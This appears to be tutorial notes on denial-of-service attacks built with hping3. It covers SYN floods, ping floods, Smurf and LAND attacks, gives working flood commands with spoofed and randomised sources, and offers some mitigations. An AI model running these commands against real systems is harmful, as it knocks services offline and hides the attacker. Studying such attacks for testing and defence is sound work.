Skip to main content


Here we will describe some of the attacks that can be performed by crafting packets manually with hping. Notice that modern firewalls will block these attacks and most Linux kernels are built in with flood protection these days. This notes are mainly meant for research and learning purpose. Anyway some of these techniques can be used to test embedded devices or novel hardware systems which is build from scratch and not based on a well known technology like GNU/linux.

DOS Attacks

hping3 -S -P -U --flood -V --rand-source
# -S is the SYN packet to establish a connection
# -P means that this is the last fragment and there are no other fragments to receive
# -U this is the URG flag, means that the target should process this packet first,
# so the packet will have a high priority
# --flood means that packets will be sent very fast
# --rand-source means that the source will be random so that we are more
# difficult to detect

SYN Flood

A simple SYN flood can be performed as:

hping3 -S --flood -V

In the following example we perform a flood attack targeting, and this form of flooding comprehends spoofing:

hping -S -a -p 22 --flood

Ping Flood

A ping flood is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP "echo request" (ping) packets. This is most effective by using the flood option of ping which sends ICMP packets as fast as possible without waiting for replies.

hping -1 <target_ip> --flood

Smurf Attack

This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS

Mitigations to Smurf Attacks

The fix is two-fold: * Configure individual hosts and routers to not respond to ICMP requests or broadcasts * Configure routers to not forward packets directed to broadcast addresses. Until 1999, standards required routers to forward such packets by default. Since then, the default standard was changed to not forward such packets * Another proposed solution is network ingress filtering, which rejects the attacking packets on the basis of the forged source address

LAND Attack

A LAND (local area network denial) attack is a DoS (denial of service) attack that consists of sending a special poison spoofed packet to a computer, causing it to lock up.

The attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address to an open port as both source and destination. This causes the machine to reply to itself continuously. It is, however, distinct from the TCP SYN Flood vulnerability.

Other LAND attacks have since been found in services like SNMP and Windows 88/tcp (kerberos/global services). Such systems had design flaws that would allow the device to accept request on the wire appearing to be from themselves, causing repeated replies.

hping3 -S -a -k -s 135 -p 135 --flood
# -S sets the SYN flag
# -a sets the spoofed IP address
# -s sets the source port
# -p sets the destination port
# -k preserves the source port
# --flood will continously and fast send packets

Remote LAND Attack

A variation on the LAND Attack is the Remote LAND Attack, where a target router’s external and internal IPs are used:

hping3 -A -S -P -U -k -s 80 -p 80 -a --flood
# --flood will continously and fast send packets, probably we don't need this
# -A sets the ACK flag
# -P sets the PUSH flag
# -S sets the SYN flag
# -U sets the URG flag
# -a sets the spoofed IP address
# -k preserves the source port
# -s sets the source port
# -p sets the destination port

Ping of Death Attack

In this kind of attack we craft an ICMP ping packet which has the maximum size of 65,535 bytes.